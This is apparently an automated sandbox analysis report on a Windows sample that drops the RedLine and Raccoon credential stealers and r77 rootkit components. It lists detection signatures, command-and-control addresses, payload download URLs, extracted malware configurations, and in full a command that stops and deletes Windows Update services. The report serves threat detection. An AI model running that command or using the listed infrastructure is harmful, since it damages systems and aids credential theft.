61 00 74 00 65 00 2E 00 65 00 78 ... 0x19141:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1943d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19739:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19a29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19d35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a025:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a305:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a611:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
0.3.N2wufLmC74.exe.a00000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.N2wufLmC74.exe.a00000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xce8:$pat14: , CommandLine: 0x192b3:$v2_1: ListOfProcesses 0x1903e:$v4_3: base64str 0x1a0b6:$v4_4: stringKey 0x16c90:$v4_5: BytesToStringConverted 0x15cf8:$v4_6: FromBase64 0x17458:$v4_8: procName 0x177db:$v5_1: DownloadAndExecuteUpdate 0x18f4e:$v5_2: ITaskProcessor 0x177c9:$v5_3: CommandLineUpdate 0x177ba:$v5_4: DownloadUpdate 0x17e51:$v5_5: FileScanning 0x16fff:$v5_7: RecordHeaderField 0x16a1e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
22.2.ofg.exe.d00000.2.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
25.2.chrome.exe.7748a8.0.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x13ec5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x141d5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x144b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x147a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x14a91:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x14d95:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15081:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15379:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15679:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15961:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15c49:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15f31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16235:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16541:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1683d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16b39:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16e29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17135:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17425:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17705:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17a11:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
39.2.zonewar.exe.c277a0.1.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
26.0.ofg.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
0.2.N2wufLmC74.exe.14817a0.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.N2wufLmC74.exe.14817a0.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x174b3:$v2_1: ListOfProcesses 0x1723e:$v4_3: base64str 0x182b6:$v4_4: stringKey 0x14e90:$v4_5: BytesToStringConverted 0x13ef8:$v4_6: FromBase64 0x15658:$v4_8: procName 0x159db:$v5_1: DownloadAndExecuteUpdate 0x1714e:$v5_2: ITaskProcessor 0x159c9:$v5_3: CommandLineUpdate 0x159ba:$v5_4: DownloadUpdate 0x16051:$v5_5: FileScanning 0x151ff:$v5_7: RecordHeaderField 0x14c1e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.2.N2wufLmC74.exe.13c0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.N2wufLmC74.exe.13c0000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xc1888:$pat14: , CommandLine: 0xd9e53:$v2_1: ListOfProcesses 0xd9bde:$v4_3: base64str 0xdac56:$v4_4: stringKey 0xd7830:$v4_5: BytesToStringConverted 0xd6898:$v4_6: FromBase64 0xd7ff8:$v4_8: procName 0xd837b:$v5_1: DownloadAndExecuteUpdate 0xd9aee:$v5_2: ITaskProcessor 0xd8369:$v5_3: CommandLineUpdate 0xd835a:$v5_4: DownloadUpdate 0xd89f1:$v5_5: FileScanning 0xd7b9f:$v5_7: RecordHeaderField 0xd75be:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Click to see the 12 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Google\brave.exe" , ParentImage: C:\Users\user\AppData\Local\Google\brave.exe, ParentProcessId: 5184, ParentProcessName: brave.exe, ProcessCommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 4560, ProcessName: cmd.exe

Snort Signatures

ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init - Source IP: 192.168.2.3 - Destination IP: 45.15.157.131

Timestamp:	192.168.2.345.15.157.13149702364572850027 12/05/22-01:32:10.044951
SID:	2850027
Source Port:	49702
Destination Port:	36457
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Agent.AETZ CnC Checkin - Source IP: 192.168.2.3 - Destination IP: 172.66.43.60

Timestamp:	192.168.2.3172.66.43.60497084432039616 12/05/22-01:33:12.770679
SID:	2039616
Source Port:	49708
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.3 - Destination IP: 45.15.157.131

Timestamp:	192.168.2.345.15.157.13149703364572850286 12/05/22-01:32:29.291113
SID:	2850286
Source Port:	49703
Destination Port:	36457
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init - Source IP: 192.168.2.3 - Destination IP: 45.15.157.131

Timestamp:	192.168.2.345.15.157.13149703364572850027 12/05/22-01:32:16.338135
SID:	2850027
Source Port:	49703
Destination Port:	36457
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 45.15.157.131 - Destination IP: 192.168.2.3

Timestamp:	45.15.157.131192.168.2.336457497032850353 12/05/22-01:32:17.345961
SID:	2850353
Source Port:	36457
Destination Port:	49703
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://tempuri.org/Entity/Id19Responseon	URL Reputation: Label: phishing
Source: http://tempuri.org/Entity/Id4y/	URL Reputation: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Avira: detection malicious, Label: HEUR/AGEN.1213193
Source: C:\Users\user\AppData\Local\Temp\8FB9.tmp	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen

Multi AV Scanner detection for submitted file

Source: N2wufLmC74.exe	ReversingLabs: Detection: 65%
Source: N2wufLmC74.exe	Virustotal: Detection: 43%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Google\brave.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Google\chrome.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Google\ofg.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\8FB9.tmp	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\zonewar.exe	ReversingLabs: Detection: 57%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Joe Sandbox ML: detected

Source: 00000027.00000002.356932186.0000000000C28000.00000004.00000001.01000000.0000000D.sdmp	Malware Configuration Extractor: Raccoon {"C2 url": ["http://77.73.133.23/"], "Bot ID": "e8691a1373ef1dd5c4f2e66fb9b58b3b", "RC4_key1": "e8691a1373ef1dd5c4f2e66fb9b58b3b"}
Source: 0.3.N2wufLmC74.exe.a00000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["45.15.157.131:36457"], "Authorization Header": "606dcc33642899c9397bfd41c8c9962f"}

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Google\chrome.exe

Unpacked PE file: 52.2.chrome.exe.3310000.2.unpack

Source: N2wufLmC74.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49706 version: TLS 1.2

Source: N2wufLmC74.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe, 00000033.00000000.346486371.00000000002D1000.00000020.00000001.01000000.0000000E.sdmp, GoogleUpdate.exe, 0000003B.00000000.364430667.00000000002D1000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: ofg.exe, 00000016.00000002.517260533.0000000000590000.00000040.00000400.00020000.00000000.sdmp, ofg.exe, 0000001A.00000002.520359531.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, ofg.exe, 0000001A.00000002.519375426.00000000028F0000.00000040.00000400.00020000.00000000.sdmp, chrome.exe, 00000034.00000002.538809265.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, chrome.exe, 00000034.00000002.539019041.0000000003310000.00000040.00001000.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.465336952.0000000006C20000.00000040.00001000.00020000.00000000.sdmp, vbc.exe, 00000035.00000002.463868930.0000000006A90000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: WSHEJM~1.JPGWSHEJMDVQC.jpg.pdb source: vbc.exe, 00000035.00000003.448037942.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: brave.exe, 0000000E.00000002.403453712.00000227AD0B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: brave.exe, 0000000E.00000002.403453712.00000227AD0B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: nss3.dll.53.dr
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: brave.exe, 0000000E.00000002.403453712.00000227AD0B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.53.dr

Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	0_2_013EA0A0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	0_2_013EA580
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 4x nop then push esi	0_2_013EA6A0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 4x nop then sub esp, 1Ch	0_2_013E5952
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 4x nop then sub esp, 1Ch	0_2_013E58E0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 4x nop then mov eax, 014A4650h	0_2_01438BF0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 4x nop then sub esp, 1Ch	0_2_013E5AB2
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 4x nop then push edi	0_2_01438DA0
Source: C:\Users\user\Desktop\N2wufLmC74.exe	Code function: 4x nop then mov eax, ecx	0_2_01462FD0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC2530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC2530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC2530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	14_2_00007FF715BC2530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then mov rax, qword ptr [rcx]	14_2_00007FF715BB5530
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BB8100
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then sub rsp, 38h	14_2_00007FF715BBC000
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC22E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC22E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC22E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC22E0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then sub rsp, 38h	14_2_00007FF715BBF1C0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then sub rsp, 38h	14_2_00007FF715BB81D0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC2490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC2490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC2490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC2490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC2490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	14_2_00007FF715BC2490
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC23A0
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 4x nop then push r13	14_2_00007FF715BC23A0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039616 ET TROJAN Win32/Agent.AETZ CnC Checkin 192.168.2.3:49708 -> 172.66.43.60:443
Source: Traffic	Snort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49702 -> 45.15.157.131:36457
Source: Traffic	Snort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49703 -> 45.15.157.131:36457
Source: Traffic	Snort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49703 -> 45.15.157.131:36457
Source: Traffic	Snort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 45.15.157.131:36457 -> 192.168.2.3:49703

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 45.15.157.131 ports 3,4,5,6,7,36457

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://77.73.133.23/
Source: Malware configuration extractor	URLs: 45.15.157.131:36457

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDatab77a
Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsoletehcf

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /attachments/976559212974997544/1048575639000715314/zonewar.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/hiuhehufw.hfe HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/dmi1dfg7n.kjylug HTTP/1.1Host: www.idpminic.org
Source: global traffic	HTTP traffic detected: GET /aula/ofg7d45fsdfgg312.sfhg HTTP/1.1Host: www.idpminic.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aula/f429fjd4uf84u.sdfh HTTP/1.1Host: www.idpminic.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 05 Dec 2022 00:32:56 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:48 GMTETag: "62548404-1f29b8"Expires: Mon, 05 Dec 2022 01:02:56 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 